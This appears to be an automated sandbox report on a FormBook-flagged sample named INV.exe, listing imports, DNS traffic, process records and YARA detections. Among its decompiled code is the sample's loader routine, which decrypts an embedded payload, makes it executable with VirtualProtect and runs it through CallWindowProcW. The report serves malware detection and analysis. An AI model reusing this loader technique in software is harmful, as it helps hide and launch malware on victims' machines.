GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, IsDebuggerPresent, IsProcessorFeaturePresent, SetConsoleCtrlHandler, CreateFileW
MPR.dll	WNetDisconnectDialog1W, WNetGetResourceParentW, WNetGetNetworkInformationW, WNetGetResourceInformationW, WNetAddConnection3A
MSACM32.dll	acmFilterTagEnumA, acmDriverEnum, acmFormatChooseW, acmStreamMessage, acmFilterEnumA, acmFormatEnumW, acmDriverDetailsW, acmFormatSuggest
loadperf.dll	LoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
GDI32.dll	UnrealizeObject, GetGlyphOutline, GetCharABCWidthsFloatW, GetNearestColor
WINSPOOL.DRV	StartDocPrinterW, SetPortW, DEVICECAPABILITIES

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 02:13:19.684223890 CET	52991	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:19.711155891 CET	53	52991	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:20.495153904 CET	53700	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:20.540332079 CET	53	53700	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:24.369039059 CET	51726	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:24.414710999 CET	53	51726	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:25.298772097 CET	56794	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:26.295061111 CET	56794	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:27.271684885 CET	53	56794	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:27.289997101 CET	53	56794	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:28.195287943 CET	56534	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:28.240853071 CET	53	56534	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:34.715626955 CET	56627	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:34.761481047 CET	53	56627	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:43.525080919 CET	56621	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:43.552237988 CET	53	56621	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:49.346569061 CET	63116	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:49.392435074 CET	53	63116	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:50.912091970 CET	64078	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:50.939233065 CET	53	64078	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:54.020884037 CET	64801	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:54.066385984 CET	53	64801	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:56.835398912 CET	61721	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:56.862602949 CET	53	61721	8.8.8.8	192.168.2.4
Nov 27, 2020 02:13:58.322797060 CET	51255	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:13:58.368381977 CET	53	51255	8.8.8.8	192.168.2.4
Nov 27, 2020 02:14:19.778223991 CET	61522	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:14:19.805511951 CET	53	61522	8.8.8.8	192.168.2.4
Nov 27, 2020 02:14:21.833511114 CET	52337	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:14:21.880470037 CET	53	52337	8.8.8.8	192.168.2.4
Nov 27, 2020 02:14:22.198148966 CET	55046	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:14:22.243976116 CET	53	55046	8.8.8.8	192.168.2.4
Nov 27, 2020 02:14:22.772913933 CET	49612	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:14:22.817907095 CET	53	49612	8.8.8.8	192.168.2.4
Nov 27, 2020 02:14:54.328602076 CET	49285	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:14:54.355868101 CET	53	49285	8.8.8.8	192.168.2.4
Nov 27, 2020 02:14:59.965514898 CET	50601	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:00.019509077 CET	53	50601	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:01.638467073 CET	60875	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:01.686320066 CET	53	60875	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:42.678425074 CET	56448	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:42.727615118 CET	53	56448	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:43.275799990 CET	59172	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:43.303050995 CET	53	59172	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:43.733561039 CET	62420	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:43.779498100 CET	53	62420	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:44.111159086 CET	60579	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:44.111537933 CET	50183	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:44.138638020 CET	53	50183	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:44.179713964 CET	53	60579	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:44.429959059 CET	61531	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:44.491183996 CET	53	61531	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:44.536788940 CET	49228	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:44.582063913 CET	53	49228	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:45.127212048 CET	59794	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:45.172296047 CET	53	59794	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:45.622747898 CET	55916	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:45.668445110 CET	53	55916	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:46.185383081 CET	52752	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:46.230737925 CET	53	52752	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:47.014724016 CET	60542	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:47.060239077 CET	53	60542	8.8.8.8	192.168.2.4
Nov 27, 2020 02:15:47.505640030 CET	60689	53	192.168.2.4	8.8.8.8
Nov 27, 2020 02:15:47.551796913 CET	53	60689	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 27, 2020 02:13:27.290100098 CET	192.168.2.4	8.8.8.8	d078	(Port unreachable)	Destination Unreachable

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: INV.exe PID: 6580 Parent PID: 4200

General

Start time:	02:13:24
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\INV.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\INV.exe'
Imagebase:	0x90000
File size:	394240 bytes
MD5 hash:	83259CB82642666503278233421C306D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6592 Parent PID: 6580

General

Start time:	02:13:24
Start date:	27/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: INV.exe PID: 6640 Parent PID: 6580

General

Start time:	02:13:25
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\INV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\INV.exe
Imagebase:	0x90000
File size:	394240 bytes
MD5 hash:	83259CB82642666503278233421C306D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 6752 Parent PID: 6640

General

Start time:	02:13:28
Start date:	27/11/2020
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872
Imagebase:	0x390000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: INV.exe PID: 6580 Parent PID: 4200 INV.exeCOMMON

Executed Functions

Function 000A7800, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113
memoryCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E000A7800(void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t48;
				void* _t49;
				signed char _t50;
				intOrPtr* _t56;
				void* _t85;
				void* _t87;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E000A7950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
				_t40 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E000A7950( *_t56(_t17), 0xc7e6f44f);
				_t44 =  *_t40(0); // executed
				 *_t43(_t44);
				_t18 =  &_v40; // 0x72637052
				_t48 = E000A7950( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(2, 0, 1, 0,  &_v12); // executed
				_t87 = 0;
				if(_t49 != 0 && _t49 == 0x57) {
					_t50 = 0;
					do {
						_t20 = 0xaf0d0 + _t50; // 0x17e1e9
						asm("rol dl, 0x2");
						asm("ror dl, 0x3");
						 *(0xaf0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
						_t50 = _t50 + 1;
					} while (_t50 < 0x1e05);
					VirtualProtect(0xaf0d0, 0x1e05, 0x40,  &_v16); // executed
					CallWindowProcW(0xaf0d0, 0xb0ed8, 0, 0, 0);
					return E000A7D10(_t87);
				}
				return _t49;
			}

0x000a7809
0x000a7810
0x000a7817
0x000a781d
0x000a7821
0x000a7828
0x000a782f
0x000a7835
0x000a7858
0x000a785a
0x000a786c
0x000a7889
0x000a7890
0x000a789d
0x000a78a6
0x000a78a9
0x000a78ab
0x000a78b8
0x000a78cb
0x000a78cd
0x000a78d2
0x000a78d9
0x000a78e0
0x000a78e0
0x000a78ec
0x000a78f4
0x000a790e
0x000a7914
0x000a7915
0x000a792c
0x000a7942
0x00000000
0x000a7945
0x000a794d

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 000A78A6
RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 000A78CB
VirtualProtect.KERNELBASE(000AF0D0,00001E05,00000040,?), ref: 000A792C
CallWindowProcW.USER32(000AF0D0,000B0ED8,00000000,00000000,00000000), ref: 000A7942

Strings

Rpcrt4.dllUser32.dll, xrefs: 000A78AB, 000A78AE
User32.dll, xrefs: 000A785A, 000A785D

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
String ID: Rpcrt4.dllUser32.dll$User32.dll
API String ID: 546183053-2494872352
Opcode ID: 3df0d46d33faee90278da1c67bcf092c3b75d0b5e95befca04789dbe411d74e0
Instruction ID: c645febcc1c4fa339ab73d52abe98ee413c11a42876f0d5ad8ead3854cd73bf0
Opcode Fuzzy Hash: 3df0d46d33faee90278da1c67bcf092c3b75d0b5e95befca04789dbe411d74e0
Instruction Fuzzy Hash: C431B171A402059FDB01DBF8CC8AFEFB7E5EF4A710F1044A5E609AB2A2DA75D9088754

Uniqueness

Uniqueness Score: -1.00%

Function 00091DCF, Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00091DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xacd50);
				E000927F0(__ebx, __edi, __esi);
				E00093117(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E000932EE();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xefd20 = _t82;
					 *0xf1b28 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xefd20; // 0x7df458
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0xefd20;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xf1a80; // 0x7e16f0
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91); // executed
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -982292
											E00092D36(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E0009207A();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E00092835(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0xf1b28 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E000932EE(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0xefd20[_t149] = _t138;
							 *0xf1b28 =  *0xf1b28 + _t141;
							__eflags =  *0xf1b28;
							while(1) {
								__eflags = _t138 - 0x800 + 0xefd20[_t149];
								if(_t138 >= 0x800 + 0xefd20[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xf1b28; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0xefd20[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E00092D36(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E00094E90(_t155, 0xaece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}

0x00091dcf
0x00091dd1
0x00091dd6
0x00091ddd
0x00091de5
0x00091de8
0x00091dec
0x00091ded
0x00091dee
0x00091df5
0x00091df7
0x00091dfc
0x00091e19
0x00091e1e
0x00091e24
0x00091e29
0x00091e2b
0x00000000
0x00000000
0x00091e2d
0x00091e33
0x00091e36
0x00091e39
0x00091e42
0x00091e45
0x00091e4b
0x00091e4e
0x00091e51
0x00091e54
0x00091e57
0x00091e57
0x00091e62
0x00091e68
0x00091e6d
0x00091fa2
0x00091fa4
0x00091fa5
0x00091fa5
0x00091fa5
0x00091fa7
0x00091fa7
0x00091faa
0x00091fad
0x00000000
0x00000000
0x00091fb8
0x00091fbe
0x00091fc1
0x00091fc4
0x00091fd8
0x00091fd8
0x00091fdc
0x00091fde
0x00091fe5
0x00091fea
0x00091fec
0x00091fec
0x00091fe0
0x00091fe2
0x00091fe2
0x00091ff0
0x00091ff6
0x00091ff9
0x00091ffc
0x0009204a
0x00092050
0x00092053
0x00092055
0x0009205a
0x0009205c
0x00092061
0x00092061
0x00000000
0x00091ffe
0x00091ffe
0x00092000
0x00000000
0x00000000
0x00092003
0x00092009
0x0009200b
0x00000000
0x00000000
0x00092010
0x00092012
0x00092017
0x0009201a
0x00092024
0x00092027
0x00092032
0x00092039
0x0009203d
0x00092042
0x00092045
0x00092064
0x00092064
0x00000000
0x00092064
0x0009202d
0x0009202d
0x0009202f
0x0009202f
0x00000000
0x0009202f
0x00092020
0x00000000
0x00092020
0x00091ffc
0x00091fc6
0x00091fc8
0x00000000
0x00000000
0x00091fd0
0x00000000
0x00091fd0
0x0009206a
0x0009206d
0x00092072
0x00092072
0x00092074
0x00092079
0x00092079
0x00091e73
0x00091e76
0x00091e78
0x00000000
0x00000000
0x00091e7e
0x00091e80
0x00091e83
0x00091e86
0x00091e8b
0x00091e93
0x00091e95
0x00091e97
0x00091e99
0x00091e99
0x00091e9e
0x00091e9e
0x00091e9f
0x00091ea2
0x00091ea2
0x00091ea8
0x00000000
0x00000000
0x00091eb4
0x00091eb6
0x00091eb9
0x00091ebb
0x00091f55
0x00091f5c
0x00091f5c
0x00091f62
0x00091f6e
0x00091f70
0x00000000
0x00000000
0x00091f72
0x00091f78
0x00091f7b
0x00091f7e
0x00091f82
0x00091f88
0x00091f8b
0x00091f8e
0x00091f91
0x00091f91
0x00091f96
0x00091f97
0x00091f9a
0x00000000
0x00091f9a
0x00091ec1
0x00091ec7
0x00000000
0x00091ec7
0x00091eca
0x00091ecc
0x00091ed1
0x00091ed2
0x00091ed5
0x00091ed8
0x00091ed8
0x00091eda
0x00000000
0x00000000
0x00091ee0
0x00091ee2
0x00091ee5
0x00091f42
0x00091f42
0x00091f43
0x00091f49
0x00091f4a
0x00091f4d
0x00091f50
0x00000000
0x00091f50
0x00091ee7
0x00091ee9
0x00000000
0x00000000
0x00091eeb
0x00091eed
0x00091eef
0x00000000
0x00000000
0x00091ef1
0x00091ef3
0x00091f03
0x00091f10
0x00091f17
0x00091f1c
0x00091f23
0x00091f2d
0x00091f31
0x00091f36
0x00091f39
0x00091f39
0x00091f39
0x00091f3c
0x00091f3f
0x00091f3f
0x00000000
0x00091f3f
0x00091ef6
0x00091efc
0x00091eff
0x00091f01
0x00000000
0x00000000
0x00000000
0x00091f01
0x00000000
0x00091ed8
0x00091e11
0x00000000

APIs

__lock.LIBCMT ref: 00091DDD

Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142

__calloc_crt.LIBCMT ref: 00091DEE

Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD

@_EH4_CallFilterFunc@8.LIBCMT ref: 00091E09
GetStartupInfoW.KERNEL32(?,000ACD50,00000064,00091146,000ACCC0,00000014), ref: 00091E62
__calloc_crt.LIBCMT ref: 00091EAD
GetFileType.KERNEL32(00000001), ref: 00091EF6

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 2621518576-0
Opcode ID: daff4c2a0ecc77722230a715ce02e52f35dab8d150c143d0d69f8b882fc5d853
Instruction ID: f7c14dc26cf176d419ad1a3d534759837349f44964dcf94711b9ad3e31d60c39
Opcode Fuzzy Hash: daff4c2a0ecc77722230a715ce02e52f35dab8d150c143d0d69f8b882fc5d853
Instruction Fuzzy Hash: B281B471A0424A9FDF24CF64CC515EDBBF0BF49324B24426DD4A6AB3D1D7399802EB54

Uniqueness

Uniqueness Score: -1.00%

Function 000AF677, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 000AF73D
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E,000AFCD3), ref: 000AF767
ReadFile.KERNELBASE(00000000,00000000,000AFCD3,?,00000000,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E), ref: 000AF77E
